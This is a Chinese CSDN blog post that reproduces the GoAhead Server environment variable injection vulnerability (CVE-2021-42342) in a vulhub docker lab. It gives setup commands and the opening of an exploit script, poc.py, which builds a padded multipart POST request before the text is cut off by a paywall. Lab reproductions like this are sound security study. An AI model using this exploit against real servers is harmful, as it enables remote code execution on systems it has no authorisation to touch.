GoAhead Server 环境变量注入(CVE-2021-42342)漏洞复现

最新推荐文章于 2022-10-01 09:30:36 发布
最新推荐文章于 2022-10-01 09:30:36 发布
阅读量903 收藏 1
点赞数 2
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Tauil/article/details/126200858
版权
本文详细介绍了GoAhead Server的CVE-2021-42342环境变量注入漏洞,包括原理分析和复现过程。通过0x01部分的分析,揭示了漏洞的本质;0x02部分则展示了漏洞复现的步骤,包括如何搭建环境,利用提供的poc.py文件和payload.c源码进行攻击。尽管初次尝试的shell未成功回显,但通过环境变量注入的特性,稍后仍能重新连接。
摘要由CSDN通过智能技术生成

0x01 漏洞原理分析

https://mp.weixin.qq.com/s/AS9DHeHtgqrgjTb2gzLJZg
https://ahmed-belkahla.me/post/2-methods-rce-0-day-in-goahead-webserver-pbctf-2021/

0x02 漏洞复现

vulhub/goahead/CVE-2021-42342 环境搭建

cd goahead/CVE-2021-42342
sudo docker-compose up -d

登录靶机IP网页即可访问,使用文件中带的poc.py

import sys
import socket
import ssl
import random
from urllib.parse import urlparse, ParseResult

PAYLOAD_MAX_LENGTH = 16384 - 200


def exploit(client, parts: ParseResult, payload: bytes):
    path = '/' if not parts.path else parts.path
    boundary = '----%s' % str(random.randint(1000000000000, 9999999999999))
    padding = 'a' * 2000
    content_length = min(len(payload) + 500, PAYLOAD_MAX_LENGTH)
    data = fr'''POST {
     path} HTTP/1.1
Host: {
     parts.hostname}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary={
最低0.47元/天 解锁文章
Tauil
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
GoAhead远程命令执行漏洞(CVE-2021-42342)
huayimy的博客
10-31 1657
复现GoAhead远程命令执行漏洞(CVE-2021-42342)
GoAhead-Server-环境变量注入(CVE-2021-42342)
bqnagus
10-01 342
GoAhead-Server-环境变量注入(CVE-2021-42342)
CVE-2021-42342漏洞复现及docker环境搭建
axdnoob的博客
07-18 2990
CVE-2021-42342 漏洞复现
【vulhub靶场复现系列】CVE-2021-42342 GoAhead Server 环境变量注入复现
Wiofgb的博客
09-01 1175
【vulhub靶场复现系列】记录一次CVE-2021-42342 GoAhead Server 环境变量注入复现
goahead环境变量注入漏洞分析
蚁景网安学院
08-26 775
cve-2017-17562远程命令执行漏洞影响Goahead 2.5.0到Goahead 3.6.5之间的版本。在cgiHandler函数中,将用户的HTTP请求参数作为环境变量,通过诸如LD_PRELOAD即可劫持进程的动态链接库,实现远程代码执行。
GoAhead-远程命令执行漏洞CVE-2017-17562)
bqnagus
10-01 754
GoAhead在接收到请求后,将会从URL参数中取出键和值注册进CGI程序的环境变量,且只过滤了`REMOTE_HOST`和`HTTP_AUTHORIZATION`。我们能够控制环境变量,就有很多攻击方式。比如在Linux中,`LD_`开头的环境变量和动态链接库有关,如`LD_PRELOAD`中指定的动态链接库,将会被自动加载;`LD_LIBRARY_PATH`指定的路径,程序会去其中寻找动态链接库。
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-21315-PoC:CVE 2021-21315 PoC
03-03
CVE-2021-21315系统信息这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()的...
goahead Web服务器 的学习(一)
热门推荐
膝盖中了一箭的博客
03-31 1万+
goahead Web服务器 的学习(一) GoAhead WebServer是一个功能强大、可以在多个平台运行的嵌入式WebServer,至于其特性就不多说了,本篇以在ubuntu系统上构建简单的动态网页为例说明使用goahead进行web开发的一般步骤,至于goahead在其他平台上的移植,后面的文章里再专门详细介绍。 使用的版本为goahead-2.1.8,好吧,这个版本确实比较老了...
GoAhead Web Server的特性及技术
macYang的专栏
10-14 1655
转载  :http://swanmsg.blog.sohu.com/120746729.html 最近一段时间,一直在搞嵌入式开发,公司一产品需要升级改造,结果发现应用的是Linux平台和GoAheadweb服务器,所以经过多方的了解,现把总结内容总结一下,大家一起和我来学习GoAhead吧。 1、 简介     廉价的硬件,功能强大的32操作系统,以及无处不在的因特网,它们一起促成了
goahead如何使用cgi服务_GoAhead Web Server的特性及技术
weixin_39792803的博客
12-19 679
最近一段时间,一直在搞嵌入式开发,公司一产品需要升级改造,结果发现应用的是Linux平台和GoAheadweb服务器,所以经过多方的了解,现把总结内容总结一下,大家一起和我来学习GoAhead吧。1、 简介廉价的硬件,功能强大的32操作系统,以及无处不在的因特网,它们一起促成了网络应用和设备的飞速增长。大量的设备连接到网络上,于是人们希望通过一种通用、熟悉、快捷的方式来访问和控制它们。嵌入式we...
goahead Web Server 环境搭建
yangguihao的博客
11-13 1万+
GoAhead WebServer GoAhead WebServer,它是一个源码,免费、功能强大、可以在多个平台运行的嵌入式WebServerGoAhead WebServer的主要特性有: 1. 支持ASP 2. 嵌入式的javascript 3. 标准的CGI执行 4. 内存中的CGI处理GoFroms 5. 扩展的API 6. 快速响应,每秒可处理超过50个请
GoAhead WebServer 架构
滴答滴--依旧
02-29 5304
GoAhead WebServer Architecture GoAhead WebServer 架构 The following diagram is provided to illustrate major WebServer functionality, showing function relationships and identifying associated files. Re
CVE-2021-45232漏洞复现
派大星的博客
01-04 7292
cve-2021-45232漏洞复现
CVE-2021-40444漏洞复现
1ance's blog
09-25 3430
简介 MSHTML(又称Trident)是微软Windows操作系统Internet Explorer(IE)浏览器的排版组件。软件开发人员使用该组件,可以在应用中快速实现网页浏览功能。MSHTML除应用于IE浏览器、IE内核浏览器外,还在Office的Word、Excel和PowerPoint文档中用来呈现Web托管内容。 9月7日,微软公司发布了针对Microsoft MSHTML远程代码执行漏洞的紧急安全公告。攻击者利用该漏洞,通过精心构造包含可被加载的恶意 ActiveX控件的Microsoft O
cve-2021-3618漏洞复现
最新发布
02-06
CVE-2021-3618漏洞是指影响了Mozilla Firefox浏览器的一个安全漏洞。该漏洞复现步骤如下: 1. 首先,你需要安装最新版本的Mozilla Firefox浏览器。确保你的浏览器已经更新到最新版本,因为最新版本通常会修复已知...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值